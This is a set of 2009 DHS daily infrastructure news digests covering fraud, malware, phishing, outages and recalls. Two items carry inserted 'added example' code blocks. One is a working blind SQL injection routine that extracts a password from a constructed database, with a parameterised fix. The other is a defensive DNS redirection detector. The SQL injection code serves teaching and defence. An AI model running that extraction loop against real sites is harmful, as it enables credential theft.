Department of Homeland Security Daily Open Source Infrastructure Report

Monday, November 30, 2009

Complete DHS Daily Report for November 30, 2009

Daily Report

Top Stories

 DarkReading reports that researchers at Red Condor detected a new phishing attack that promises to enhance the security of the user’s emailbox and then downloads a banking Trojan instead. Red Condor says it has stopped more than 3.5 million messages belonging to the spam campaign, which was detected on November 20. (See item 46 in the Information Technology Sector below)


 According to the Associated Press, the Governor of New Jersey asked the President on November 25 to declare much of the Jersey shore a disaster area due to damages exceeding $49 million from a recent coastal storm. Tourism is New Jersey’s second-largest industry, accounting for nearly $39 billion a year, much of it from the shore. (See item 54)


54. November 25, Associated Press – (New Jersey) NJ Governor Corzine seeks Presidential declaration of disaster area for Jersey Shore. The Governor of New Jersey asked the President on November 25 to declare much of the Jersey shore a disaster area due to damage from a recent coastal storm. The Governor wrote that damages will exceed $49 million. He said emergency funds to restore beaches, dunes and structures are needed immediately to protect lives and homes from further winter storms now that many coastal areas are unprotected. “Beach erosion is extensive,” the letter stated. “Many of the beaches along our coast have been eroded to the point they offer little protection from future storms. The damages already sustained to the beaches and dunes will render New Jersey particularly vulnerable to these weather systems until restoration is completed.” The Governor also wrote that the beaches are a crucial part of the state and local economies. Tourism is New Jersey’s second-largest industry, accounting for nearly $39 billion a year, much of it from the shore. The storm, which lasted from November 11 to 15, caused extensive erosion in Cape May, Atlantic and Ocean counties. Roofs were blown off buildings, a key shore bridge was damaged and had to be closed when it was struck by a wayward barge, dunes were wiped out and entire communities flooded. Source: http://cbs3.com/local/New.Jersey.Governor.2.1334593.html


Details

Banking and Finance Sector

13. November 27, Lansing State Journal – (Michigan) Williamston man pleads guilty in Ponzi scheme. A 28-year-old Williamston man has pleaded guilty in federal court to running a $1.3 million Ponzi scheme, authorities said. According to the U.S. Attorney’s Office in Grand Rapids, the man admitted the week of November 23 that he set up a stock trading company, known as Kingdom First Trading, and solicited investors by promising returns higher than market rate. He consistently lost money in trading, but hid that from investors by e-mailing fake account statements that said they were earning sizable profits and accumulating large balances, authorities said. He took money from new investors to pay earlier investors. He also used that money for rent, automobiles and jewelry, authorities said. He will be sentenced on March 15, 2010 and faces up to 20 years in prison. He pleaded guilty Monday to wire fraud, according to court records. As part of the plea agreement, he must pay more than $1.31 million in restitution to the victims. Source: http://www.lansingstatejournal.com/article/20091127/NEWS01/311270006/1001/NEWS/Williamston-man-pleads-guilty-in-Ponzi-scheme


14. November 27, Wall Street Journal – (International) Technical glitch shuts London trade for hours. London Stock Exchange Group PLC (LSE) on November 26 was hit by a technical glitch, forcing it to suspend the trading of U.K. stocks for more than three hours. The exchange stopped trading of shares at 10:33 a.m. GMT (5:33 a.m. EST) after receiving reports that some stocks had “connectivity issues,” a spokesman said. Trading resumed at 2 p.m. GMT, but the cause of the problem was still being investigated. The glitch comes a day after the chief executive officer reiterated plans for the LSE to replace its TradElect trading engine with a new, faster one. It also comes after another glitch earlier this month when 300 stocks could not be traded for an hour and a half before the market closed. An LSE spokesman said that “There were a number of connectivity issues this morning, so we placed all the order-driven securities into an auction period.” Source: http://online.wsj.com/article/SB10001424052748703499404574559372702658330.html?mod=rss_markets_main


15. November 23, WRTV 6 Indianapolis – (Indiana) Police: Skimmers take unsuspecting customers’ cash. Several suspected ATM skimming incidents have been reported in recent weeks in communities north of Indianapolis, prompting police to release a surveillance picture of one man believed to be involved. A Carmel police detective said the man pictured recently used a victim’s credit card to buy electronics at Fry’s Electronics on 96th Street in Fishers and a Best Buy store on Michigan Road in Carmel. He said he thinks the victim’s credit card may have been swiped and reproduced through a skimmer at an area gas station and that similar crimes have occurred recently in Fishers, Westfield, Noblesville, Lawrence and Indianapolis. “There have been several victims throughout Hamilton County, and that card information has been used everywhere from Avon to Muncie...down to Greenwood and a lot of places in between,” said the Carmel police lieutenant. Consumers should closely look at any device in which they are swiping a credit or debit card. Source: http://www.theindychannel.com/news/21698452/detail.html


16. November 23, The Register – (International) iPhone worm infects devices and redirects Dutch online bank users to a phishing site. The second worm to infect jailbroken iPhones reportedly targets customers of Dutch online bank ING Direct. Users visiting the bank’s site from infected devices are redirected to a phishing site designed to harvest online banking login details, the BBC reports. ING Direct told the BBC it planned to warn users of the attack via its website, as well as briefing front-line call center staff on the threat. The chief research officer at F-Secure said the threat had in any case been neutralized: “It [the worm] was targeting ING. The websites it needed for this to work have now been taken down.” Anti-virus analysts, still in the process of analyzing the malware, caution that the attack is more complex than simple phishing and appears to include an attempt to intercept the SMS messages used to confirm online banking transactions. The “Duh” or Ikee-B worm gets in the same way as the original Ikee worm, through the SSH service left running with its default root password on jailbroken phones, but the latest malware is far more dangerous than its predecessor. Duh turns compromised devices into a botnet under the control of unidentified hackers, whereas the Rickrolling Ikee worm only changed users’ wallpaper to an image of a pop singer. As previously reported, compromised phones are left under the control of a botnet server in Lithuania. Duh also changes the root password of compromised iPhones, allowing the crooks to log into compromised units and carry out further malicious actions; a SophosLabs researcher used a password-cracking tool to discover that the malware changes the iPhone root password from ‘alpine’ to ‘ohshit’. In addition to the two iPhone worms, an earlier hacking/extortion attack targeting iPhone users in the Netherlands also exploited the default SSH password on jailbroken iPhones. Security experts strongly advise users of jailbroken phones to change their passwords from ‘alpine’ immediately to avoid further attacks along the same lines. Source: http://cyberinsecure.com/iphone-worm-infects-devices-and-redirecs-dutch-online-bank-users-to-a-phishing-site/


For another story, see item 46 in the Information Technology Sector below


Information Technology Sector

44. November 27, The Register – (International) Smut-laden spam disguises WoW Trojan campaign. A malicious spam campaign that attempts to harvest online game passwords under the guise of messages containing smutty photos is doing the rounds. The tainted emails have subject lines such as “Do you like to find a girlfriend like me?” and an attached archive file called “my photos.rar”. Rather than photos, the archive holds video files together with a password-stealing Trojan called Agent-LVF, which is designed to steal the login credentials of World of Warcraft gamers. Security firm Sophos reckons it is likely the stolen credentials and associated in-game assets will be sold through underground sites, earning hackers a tidy profit in the process. “A surprising amount of malware is designed to steal registration keys, passwords and data from players of computer games,” said a consultant at Sophos. “This isn’t just about doing better in a computer game. Criminals are stealing virtual assets like armour, money and weapons to trade for hard cash in the real world.” Source: http://www.theregister.co.uk/2009/11/27/wow_trojan_spam/


45. November 25, ComputerWorld Canada – (National) H1N1’s IT threats may not be taken seriously. It appears that the threat of an H1N1 outbreak has not prompted enterprises to re-evaluate their disaster recovery plans or better enable a mobile workforce, according to a new Cisco Systems Inc. study. The networking giant found that only 22 percent of survey respondents consider their remote-access infrastructure to be disaster-ready. The survey polled 500 IT security decision-makers at U.S. health-care, financial, retail, and public sector organizations last month. In addition, the report indicated that 21 percent of respondents admitted to having no employees enabled to work remotely and 53 percent said that less than half of their employees are capable of working from home. The director of security solutions marketing at Cisco said many of these organizations will be the hardest hit in the event of a flu pandemic. But even less extreme circumstances, such as a major road closure or a winter storm, would probably have a noticeable impact on the business as well. Ensuring that all essential workers are enabled with remote-access capabilities is crucial, he added, to operating business as usual during unexpected events. Providing remote VPN connectivity back into the office might be enough for a mobile worker who just requires e-mail or a select few applications, but for employees who require real-time communication and full telephony capabilities, some investments should be made, he said. A security analyst at Fusepoint Managed Services Inc. said the first issues he would address as an IT security leader would be technology-related. “Do we have the tools and technologies in place for employees to be working remotely?” he said. “Do we have the bandwidth? Do we have the storage capability within our phone systems and e-mail servers to be able to queue two or more weeks of data from more than 40 percent of your missing staff?” Source: http://www.itworldcanada.com/news/h1n1s-it-threats-may-not-be-taken-seriously/139420


46. November 25, DarkReading – (International) New exploit masquerades as Flash Player upgrade. Researchers have detected a new phishing attack that promises to enhance the security of the user’s emailbox — and then downloads a malicious Trojan instead. The email requests that recipients click on a link in the body of the email to update the “security mode” of their emailboxes, according to researchers at Red Condor, an email security tool vendor. Users who click on the link are taken to a Website that advises them to update to the latest version of the Macromedia Flash Player by downloading “flashinstaller.exe.” This executable is actually a banking Trojan that is known to disable firewalls, steal sensitive financial data, and provide hackers with remote access capabilities, Red Condor says. The malware is more commonly known as Win32:Zbot-MGA (Avast), W32/Bifrost.C.gen!Eldorado (F-Prot), PWS-Zbot.gen.v (McAfee), or PWS:Win32/Zbot.gen!R (Microsoft), the researchers note. The spam campaign was detected late on November 20; within the first six hours, Red Condor says it blocked more than 500,000 email messages. So far, the company says it has stopped more than 3.5 million messages belonging to this campaign. Source: http://darkreading.com/security/attacks/showArticle.jhtml?articleID=221901213&cid=ref-true


47. November 25, eWeek – (International) Symantec Web site hack exposes user data. A hacker recently demonstrated how a SQL injection vulnerability in a Symantec Web site could be exploited to reveal user data. Symantec says the vulnerability only impacts customers in Japan and South Korea. A Web site operated by security firm Symantec was hacked, giving an attacker a sneak peek at sensitive customer data. The Romanian hacker known as Unu exploited a blind SQL injection problem to get his hands on clear-text passwords associated with customer records and other data. Unu used sqlmap and Pangolin to demonstrate the vulnerability, and published screenshots to his blog. According to Symantec, the vulnerability was on its pcd.symantec.com site, which is used to facilitate customer support for Symantec’s Norton products in Japan and South Korea. “At this time, we believe that this incident does not affect Symantec customers anywhere else in the world,” a Symantec spokesperson said November 24. “This incident impacts customer support in Japan and South Korea but does not affect the safety and usage of Symantec’s Norton-branded consumer products. Symantec is currently in the process of ensuring that the Website is appropriately secured and will bring it back online as soon as possible.” According to Unu, his goal was not to cause harm, but to create a stir so the problem would be fixed. A Trend Micro advanced threats researcher said sensitive data should never be stored in clear text and that bounds checking of input data can help avoid buffer overflows and SQL injection attacks. Source: http://www.eweek.com/c/a/Security/Symantec-Website-Hack-Exposes-User-Data-639128/
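The blind SQL injection described in item 47, as an added worked example that is not Symantec’s code and does not reproduce Unu’s sqlmap or Pangolin output: a customer lookup that pastes user input into the SQL text, the same lookup with a bound parameter beside it, and the boolean inference loop that recovers a clear-text password one character at a time from nothing more than a true/false answer. The table, rows, column names and passwords are constructed for the demonstration. Note that a length limit on the input alone would not have stopped this, since each probe fits in a short string; the fix is parameterisation, and not storing passwords in clear text in the first place.

```python
"""Boolean-based blind SQL injection against a lookup that concatenates
user input into SQL, with the parameterised lookup beside it.

Added example: not Symantec's code and not a reproduction of the sqlmap or
Pangolin output mentioned in the article. Table, rows, column names and
passwords are constructed for the demonstration."""
import sqlite3
import string


def make_db() -> sqlite3.Connection:
    """Constructed support database. Passwords are stored in clear text,
    which is the condition the article describes."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE customers (email TEXT PRIMARY KEY, password TEXT)")
    db.executemany(
        "INSERT INTO customers VALUES (?, ?)",
        [("alice@example.com", "Tokyo2009"), ("bob@example.com", "seoul-pw")],
    )
    return db


def customer_exists_vulnerable(db: sqlite3.Connection, email: str) -> bool:
    """Vulnerable: the caller's input becomes part of the SQL text.
    The function only reveals whether a row matched, and that single bit
    is all a blind attack needs."""
    sql = f"SELECT 1 FROM customers WHERE email = '{email}'"
    return db.execute(sql).fetchone() is not None


def customer_exists_safe(db: sqlite3.Connection, email: str) -> bool:
    """Hardened: the input is bound as a parameter, so a quote or a comment
    marker inside it is just data the database compares against."""
    row = db.execute("SELECT 1 FROM customers WHERE email = ?", (email,)).fetchone()
    return row is not None


# Candidate characters, tried in this order for each position.
CHARSET = string.ascii_letters + string.digits + string.punctuation


def blind_extract_password(oracle, victim: str, max_len: int = 64) -> str:
    """Recover the victim's password using only the true/false answers of
    oracle(email_input). Each probe closes the string literal, appends a
    condition the database evaluates, and comments out the trailing quote.
    Candidate characters are passed as char(<code point>) so the probe
    never needs a quote of its own."""
    recovered = ""
    for pos in range(1, max_len + 1):
        # Is there a character at this position at all?
        if not oracle(f"{victim}' AND length(password) >= {pos} -- "):
            break
        for ch in CHARSET:
            probe = f"{victim}' AND substr(password, {pos}, 1) = char({ord(ch)}) -- "
            if oracle(probe):
                recovered += ch
                break
        else:
            break  # character outside CHARSET; stop rather than loop forever
    return recovered


def demo() -> dict:
    """Run the attack against both lookups and report what each leaks."""
    db = make_db()
    leaked = blind_extract_password(
        lambda s: customer_exists_vulnerable(db, s), "alice@example.com")
    blocked = blind_extract_password(
        lambda s: customer_exists_safe(db, s), "alice@example.com")
    return {"vulnerable": leaked, "parameterised": blocked}


if __name__ == "__main__":
    print(demo())  # {'vulnerable': 'Tokyo2009', 'parameterised': ''}
```

Against the parameterised lookup the very first probe fails, because the database is asked for a row whose e-mail is literally the whole injected string. Against the concatenating lookup the loop needs at most len(charset) queries per character, which is why tools such as sqlmap automate exactly this pattern; a web application firewall or a length check only raises the cost, it does not remove the oracle.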


48. November 25, IDG News Service – (International) Metasploit releases IE attack, but it’s unreliable. Developers of the open-source Metasploit penetration testing toolkit have released code that can compromise Microsoft’s Internet Explorer browser, but the software is not as reliable as first thought. The code exploits an Internet Explorer bug that was disclosed recently in a proof-of-concept attack posted to the Bugtraq mailing list. That first code was unreliable, but security experts worried that someone would soon develop a better version that would be adopted by cyber-criminals. The original attack used a “heap-spray” technique to exploit the vulnerability in IE. But for a while Wednesday, it looked as though the Metasploit team had released a more reliable exploit. They used a different technique to exploit the flaw, but Metasploit eventually pulled its code. Microsoft said via e-mail Wednesday afternoon that it was “currently unaware of any attacks in the wild using the exploit code or of any customer impact.” The two versions of the browser that are vulnerable to the flaw — IE 6 and IE 7 — are used by about 40 percent of Web surfers. The flaw lies in the way IE retrieves certain Cascading Style Sheet objects, used to create a standardized layout on Web pages. Concerned IE users can upgrade their browser or disable JavaScript to avoid an attack. Source: http://www.computerworld.com/s/article/9141485/Metasploit_releases_IE_attack_but_it_s_unreliable?taxonomyId=17


49. November 24, Forbes – (International) The year of the mega data breach. According to the Identity Theft Resource Center (ITRC), government agencies and businesses reported 435 breaches as of November 17, on track to show a 50 percent drop from the number of breaches reported in 2008. That would make 2009 the first year that the number of reported data breaches has dropped since 2005, when the ITRC started counting. But the decrease in data breaches is deceptive. In fact, the number of personal records that were exposed by hackers has skyrocketed to 220 million records so far this year, compared with 35 million in 2008. That represents the largest collection of lost data on record. “Why are organizations that have these massive amounts of our data still not encrypting it?” the ITRC director says. “When we know we have these super breaches going on, why are they resisting a technology that could prevent them?” Setting aside 2009’s two “super breaches” — Heartland Payment Systems and the National Archives and Records Administration — the ITRC only recorded around 14 million lost records this year, a comparatively small number. But the chief executive of the Ponemon Institute doubts that the ITRC accounting is complete. Ponemon does not believe the adoption of DLP and encryption is stemming the flood of personal data. He says those technologies are often implemented spottily and cannot keep up with all the new places from which data can be stolen, from smart phones to Web collaboration tools. “We shouldn’t take false comfort in the idea that companies are doing a better job of this,” Ponemon says. “There’s no question that more companies are using DLP and encryption tools. But there’s always a human factor, and many people simply don’t take these technologies seriously.” Source: http://www.forbes.com/2009/11/24/security-hackers-data-technology-cio-network-breaches.html


For more stories, see item 16 in the Banking and Finance Sector above and 53 below in the Communications Sector


Communications Sector

50. November 27, Associated Press – (Iowa) Animal knocks out cable in eastern Iowa town. An animal chewed through a cable line, knocking out cable and Internet service to roughly 1,000 customers in an eastern Iowa town. The disruption occurred Thursday afternoon in Bellevue, near Dubuque. Officials say service is slowly being restored to subscribers of Bellevue’s municipal cable system. One official says cable and Internet service was restored by about 8:30 p.m. Thursday, but that it is taking time to get all customers back online. Source: http://www.kcautv.com/Global/story.asp?S=11579874


51. November 25, ZDNet – (National) DreamHost customers hit with nightmare. Hosting company DreamHost had trouble keeping its customer sites up and running as it migrated to a new data center. The problems began to appear on November 22 and stretched almost into Thanksgiving. Customers reported that their sites were down for 24 hours at a clip, and when service did come back it was not reliable. Among the problems: DreamHost had been upgrading its shared hosting hardware, the upgrade went wrong, and customer support did not know what was going on. Source: http://blogs.zdnet.com/BTL/?p=27841


52. November 25, U.S. Environmental Protection Agency – (National) Verizon Wireless voluntarily discloses environmental violations. Verizon Wireless has agreed to pay a $468,600 civil penalty to settle self-disclosed violations of federal environmental regulations discovered at 655 facilities in 42 states. Verizon voluntarily entered into a corporate audit agreement with the U.S. Environmental Protection Agency and conducted environmental compliance audits at more than 25,000 facilities nation-wide. The Environmental Appeals Board at EPA has approved an administrative settlement resolving violations Verizon found through its compliance audits. Verizon audited facilities that include cell towers, mobile switch centers, call centers, and administrative offices. As a result of its audit, the company reported violations of clean water, clean air, and emergency planning and preparedness regulations to EPA. Verizon promptly corrected the violations found during its audit, which included preparing and implementing spill prevention, control, and countermeasure plans, applying for appropriate air permits, and submitting reports to state and local emergency planning and response organizations informing them of the presence of hazardous substances. Source: http://yosemite.epa.gov/opa/admpress.nsf/d0cf6618525a9efb85257359003fb69d/aa169813e7e6464085257679006910ef!OpenDocument


53. November 25, IDG News Service – (International) Redirecting DNS requests can harm the Internet, says ICANN. The Internet Corporation for Assigned Names and Numbers (ICANN) on Tuesday condemned the practice of redirecting Internet users to a third-party Web site or portal when they misspell a Web address and type a domain name that does not exist. Rather than return an error message for Domain Name System requests for nonexistent domains, some DNS operators send back the IP address of another domain, a process known as NXDOMAIN substitution. The target address is often a Web portal or information site. Handling DNS requests this way has a number of drawbacks that could lead to the Internet not working properly, according to ICANN. For example, users sending e-mail to a domain that does not exist should get an immediate error message. However, if the message is redirected to a site set up to handle Web traffic, it is likely to get queued and an error message will not arrive for days, ICANN said. Also, users will get longer response times if the site to which they are supposed to be redirected goes down. Redirection sites are prime targets for attacks by hackers who want to send users to their own servers. There are also privacy issues, according to ICANN. If sensitive data is redirected via a country with a different jurisdiction and local law, there could be consequences for both users and registries, it said. ICANN published its opinions and findings in a draft memo before the introduction of new generic top-level domains (gTLDs). The organization discourages the practice of redirecting requests for nonexistent domains, and suggests banning it in a draft of the agreement owners of the new gTLDs would have to sign. ICANN wants domain owners wishing to redirect DNS requests to first explain why doing so will not cause any problems. Source: http://www.pcworld.com/article/183135/redirecting_dns_requests_can_harm_the_internet_says_icann.html
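One way to test whether a resolver performs the NXDOMAIN substitution item 53 describes, as an added example that is not ICANN’s code or part of its draft memo: ask for a random label that cannot exist and look at the reply. A faithful resolver answers with RCODE 3 (NXDOMAIN); a substituting one answers RCODE 0 with an A record for its portal. The code below builds the query and parses the reply with the standard library only. The two replies in demo() are constructed here so the check runs without network access; probe_resolver() is the live version, to be pointed at a resolver of your choosing, and the portal address 203.0.113.10 is a documentation-range placeholder.

```python
"""Detecting NXDOMAIN substitution by a recursive resolver.

Added example, not ICANN's code. It asks for a random label that cannot
exist and classifies the reply: RCODE 3 is the honest NXDOMAIN, RCODE 0
with an A record means the resolver substituted an address. Only the
standard library is used; the two replies in demo() are constructed here
so the check runs without network access."""
import secrets
import socket
import struct

RCODE_NOERROR, RCODE_NXDOMAIN = 0, 3
TYPE_A, CLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    """Wire-format name: length-prefixed labels, terminated by a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def build_query(name: str, txid: int) -> bytes:
    """Standard query for an A record with the RD (recursion desired) bit set."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", TYPE_A, CLASS_IN)


def skip_name(msg: bytes, off: int) -> int:
    """Return the offset just past a name, which may end in a compression pointer."""
    while True:
        length = msg[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:   # 2-byte pointer terminates the name
            return off + 2
        off += 1 + length


def parse_response(msg: bytes) -> dict:
    """Pull out the transaction id, RCODE and any A records in the answer section."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):
        off = skip_name(msg, off) + 4          # skip QTYPE and QCLASS
    answers = []
    for _ in range(an):
        off = skip_name(msg, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        if rtype == TYPE_A and rdlen == 4:
            answers.append(socket.inet_ntoa(msg[off:off + 4]))
        off += rdlen
    return {"id": txid, "rcode": flags & 0x0F, "answers": answers}


def classify(txid: int, response: bytes) -> str:
    """Label a reply to a query for a name that cannot exist."""
    r = parse_response(response)
    if r["id"] != txid:
        return "mismatched-id"      # not the reply to our query; ignore it
    if r["rcode"] == RCODE_NXDOMAIN:
        return "nxdomain"           # faithful answer
    if r["rcode"] == RCODE_NOERROR and r["answers"]:
        return "substituted"        # resolver handed back somebody's portal
    return f"other(rcode={r['rcode']})"


def build_response(query: bytes, rcode: int, a_records=()) -> bytes:
    """Constructed reply to `query`, standing in for a resolver in the offline demo."""
    txid = struct.unpack("!H", query[:2])[0]
    header = struct.pack("!HHHHHH", txid, 0x8180 | rcode, 1, len(a_records), 0, 0)
    rrs = b"".join(
        struct.pack("!HHHIH", 0xC00C, TYPE_A, CLASS_IN, 60, 4) + socket.inet_aton(ip)
        for ip in a_records)        # 0xC00C: pointer to the question name at offset 12
    return header + query[12:] + rrs


def random_probe_name(tld: str = "com") -> str:
    """A label no registrant holds, so the only honest answer is NXDOMAIN."""
    return f"nx-{secrets.token_hex(8)}.{tld}"


def probe_resolver(server: str, tld: str = "com", timeout: float = 3.0) -> str:
    """Live check of one resolver over UDP/53 (needs network access)."""
    txid = secrets.randbits(16)
    query = build_query(random_probe_name(tld), txid)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(query, (server, 53))
        data, _ = s.recvfrom(512)
    return classify(txid, data)


def demo() -> dict:
    """Offline demonstration: two constructed replies to the same query."""
    txid = 0x1234
    query = build_query(random_probe_name(), txid)
    honest = build_response(query, RCODE_NXDOMAIN)
    rewritten = build_response(query, RCODE_NOERROR, ["203.0.113.10"])  # placeholder portal
    return {"honest": classify(txid, honest), "rewritten": classify(txid, rewritten)}


if __name__ == "__main__":
    print(demo())  # {'honest': 'nxdomain', 'rewritten': 'substituted'}
```

Run probe_resolver() once per TLD you care about, since an operator may substitute only under some of them, and run it with a fresh random label each time so a cached answer cannot mask the behaviour. The transaction-id check matters in the live path: a reply carrying a different id is not the answer to your question and must not be classified as either result.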


Department of Homeland Security Daily Open Source Infrastructure Report

Friday, November 27, 2009

Complete DHS Daily Report for November 27, 2009

Daily Report

Top Stories

 According to the Associated Press, Toyota Motor Corp. said on November 25 it will replace accelerator pedals on 3.8 million recalled vehicles in the United States to address problems with the pedals becoming jammed in the floor mat. As a temporary step, Toyota will have dealers shorten the length of the gas pedals beginning in January while the company develops replacement pedals for their vehicles, the Transportation Department and Toyota said. (See item 8)


8. November 25, Associated Press – (National) Toyota to replace 3.8 million gas pedals. Toyota Motor Corp. said on November 25 it will replace accelerator pedals on 3.8 million recalled vehicles in the United States to address problems with the pedals becoming jammed in the floor mat. As a temporary step, Toyota will have dealers shorten the length of the gas pedals beginning in January while the company develops replacement pedals for their vehicles, the Transportation Department and Toyota said. New pedals will be available beginning in April, and some vehicles will have brake override systems installed as a precaution. Toyota, the world’s largest automaker, announced the massive recall in late September and told owners to remove the driver’s side floor mats to prevent the gas pedal from potentially becoming jammed. Popular vehicles such as the Toyota Camry, the top-selling passenger car in America, and the Toyota Prius, the best-selling gas-electric hybrid, are part of the recall. It includes the 2007-10 model year Camry, 2005-10 Toyota Avalon, 2004-09 Prius, 2005-10 Toyota Tacoma, 2007-10 Toyota Tundra, 2007-10 Lexus ES350 and 2006-10 Lexus IS250/350. The recall involving the accelerators was Toyota’s largest in the U.S. It was prompted by a high-speed crash in August involving a 2009 Lexus ES350 that killed a California Highway Patrol officer and three members of his family near San Diego. The Lexus hit speeds exceeding 120 mph, struck a sport utility vehicle, launched off an embankment, rolled several times and burst into flames. To fix the problem, Toyota and the government said dealers will shorten the length of the accelerator pedal on the recalled vehicles and in some cases remove foam from beneath the carpeting near the pedal to increase the space between the pedal and the floor. They said owners of the ES350, Camry and Avalon would be the first to receive notification because the vehicles are believed to have the highest risk for pedal entrapment. Source: http://www.msnbc.msn.com/id/34145358/ns/business-autos/


 The IDG News Service reports that a 32-year-old California man pleaded guilty on November 20 to charges that he sold thousands of counterfeit chips to the U.S. Navy. (See item 11)


11. November 24, IDG News Service – (National) Man pleads guilty to selling fake chips to US Navy. A 32-year-old California man has pleaded guilty to charges that he sold thousands of counterfeit chips to the U.S. Navy. In a plea agreement reached on Friday, a Newport Coast, California man pleaded guilty to conspiracy and counterfeit-goods trafficking for his role in an alleged chip-counterfeiting scam that ran between 2007 and 2009. The man, his wife, and her brother operated several microchip brokerage companies that imported chips from Shenzhen, in China’s Guangdong province. They would buy counterfeit chips from China or else take legitimate chips, sand off the brand markings and melt the plastic casings with acid to make them appear to be of higher quality or a different brand, the U.S. Department of Justice said in a press release. Source: http://www.computerworld.com/s/article/9141438/Man_pleads_guilty_to_selling_fake_chips_to_US_Navy


Details

Banking and Finance Sector

13. November 24, KTVB 7 Boise – (Idaho) Text message scam targeting bank customers. Nampa, Idaho, officers say a text message scam is circulating that claims to be an “emergency notification” concerning their bank account – and tries to get the victim to call a toll-free number. When someone calls, they are solicited for account information or charged an extreme amount of money for making the call itself. Police say that the latest round is targeting customers of Mountain Gem Credit Union. Police warn you to ignore the text, and not to give any information out unless you are sure where it is going. If you have questions, you are advised to call your local bank branch. Source: http://www.ktvb.com/news/Text-message-scam-targeting-bank-customers-72748877.html


14. November 24, DarkReading – (International) CSI annual report: financial fraud, malware on the increase. Malware and financial fraud were among the chief “growth threats” posed to businesses in 2009, according to a new study from the Computer Security Institute that will be published next week. CSI’s 14th annual security survey, which will be distributed in conjunction with a free December 1 Webcast, covers a wide range of issues related to security management, including current threats, data loss statistics, and trends in technology usage. Respondents reported big jumps in the incidence of financial fraud (19.5 percent, up from 12 percent last year); malware infection (64.3 percent, up from 50 percent last year); denial-of-service attacks (29.2 percent, up from 21 percent last year); password sniffing (17.3 percent, up from 9 percent last year); and Web site defacement (13.5 percent, up from 6 percent last year). The survey showed significant dips in wireless exploits (7.6 percent, down from 14 percent in 2008), and instant messaging abuse (7.6 percent, down from 21 percent). “The financial fraud was a major concern because the cost of those incidents is so high,” says Sara Peters, senior editor at CSI and author of this year’s report. Financial fraud costs enterprises approximately $450,000 per incident, according to the study. While financial fraud costs rose in 2009, average losses due to security incidents of all types are down this year — from $289,000 per respondent to $234,244 per respondent, CSI says. Those numbers are still higher than 2005 and 2006 figures. Twenty-five percent of respondents stated the majority of their financial losses in the past year were due to nonmalicious actions by insiders. Source: http://www.darkreading.com/security/vulnerabilities/showArticle.jhtml?articleID=221901046


Information Technology Sector

27. November 24, Department of Justice – (Florida) Former United Way employee sentenced for damaging charity’s computer network. The acting United States attorney for the Southern District of Florida, and the Special Agent in Charge, Federal Bureau of Investigation, Miami Field Office, announced the sentencing of a defendant on charges of computer fraud. On November 24, a U.S. district court judge sentenced the defendant to 18 months’ imprisonment, to be followed by three years of supervised release. In addition, the Court ordered him to pay more than $50,000 in restitution. According to documents filed with the Court, the defendant was a former employee of United Way of Miami-Dade (“UWMD”). He was employed as a computer specialist from July to December 2007. Approximately one year after he left UWMD’s employ, the defendant accessed United Way’s network without authorization. He deleted numerous files from UWMD’s servers and disabled UWMD’s telephone voice mail system, which prevented callers from leaving messages for UWMD and prevented UWMD employees from accessing their voice mail accounts. The defendant pled guilty to computer fraud on September 16, 2009. Source: http://miami.fbi.gov/dojpressrel/pressrel09/mm112409.htm


28. November 24, GAO Info – (National) FBI puts cyber threats in perspective. The FBI considers the cyber threat against our nation to be one of the greatest concerns of the 21st century. Despite the enormous advantages of the Internet, there is a gaping and widening hole in the security posture of both U.S. private sector and government networked systems. An increasing array of sophisticated state and non-state actors have the capability to steal, alter or destroy our sensitive data and, in the worst of cases, to manipulate from afar the process control systems that are meant to ensure the proper functioning of portions of our critical infrastructure. Moreover, the number of actors with the ability to utilize computers for illegal, harmful, and possibly devastating purposes continues to rise. When assessing the extent of the cyber threat, the FBI considers both the sophistication and the intent of U.S. adversaries. The most sophisticated actors have the ability to alter our hardware and software along the global supply chain route, conduct remote intrusions into our networks, establish the physical and technical presence necessary to re-route and monitor our wireless communications, and plant dangerous insiders within our private sector and government organizations. The actors that currently have all of these capabilities - which is a finding that is distinct from whether and when they are using them - include multiple nation states and likely include some organized crime groups. The FBI has not yet seen a high level of end-to-end cyber sophistication within terrorist organizations. Still, the FBI is aware of and investigating individuals who are affiliated with or sympathetic to al-Qaeda who have recognized and discussed the vulnerabilities of the U.S. infrastructure to cyber attack, who have demonstrated an interest in elevating their computer hacking skills, and who are seeking more sophisticated capabilities from outside of their close-knit circles. Should terrorists obtain such capabilities, they will be matched with destructive and deadly intent. Source: http://www.govinfosecurity.com/articles.php?art_id=1962


For another story, see item 29 below


Communications Sector

29. November 24, IDG News Services – (International) Palm, Sprint pursue lost data from Pre, Pixi. Palm and Sprint are trying to solve problems some users have had moving data from one Palm webOS device to another, a task that has caused some to lose contacts and calendar entries, according to blogs and online user comments. Users of the Palm Pre and Pixi, the first two devices to run Palm’s webOS, can back up contacts, calendar entries, tasks and memos to an online Palm Profile. From that password-protected Web page, they can synchronize that data to another webOS device over the air if they have to change phones for any reason. Normally, one copy of that data resides on the handset and the other in the user’s Palm Profile on Palm’s servers. But some users who have had to replace or reset their webOS devices have found large amounts of their information missing and apparently irretrievable, according to a post last week on the Palm-oriented blog Pre Central. Several people posted comments on the item, describing data losses. Palm said in a statement it is working with Sprint to solve the problems those users are having. “We are seeing a small number of customers who have experienced issues transferring their Palm Profile information to another Palm webOS device,” the company said. “Palm and Sprint are working closely together to support these customers to successfully transfer their information to the new device.” It’s not the first glitch in online backup for mobile phones. Last month, many users of the T-Mobile Sidekick phone from Microsoft’s Danger division lost contacts, photos and other data permanently after a server failure. The incidents could raise concerns among consumers about relying on network-based synchronization instead of backing up data to their own PCs or Macs. Source: http://www.computerworld.com/s/article/9141461/Palm_Sprint_pursue_lost_data_from_Pre_Pixi

Department of Homeland Security Daily Open Source Infrastructure Report

Wednesday, November 25, 2009

Complete DHS Daily Report for November 25, 2009

Daily Report

Top Stories

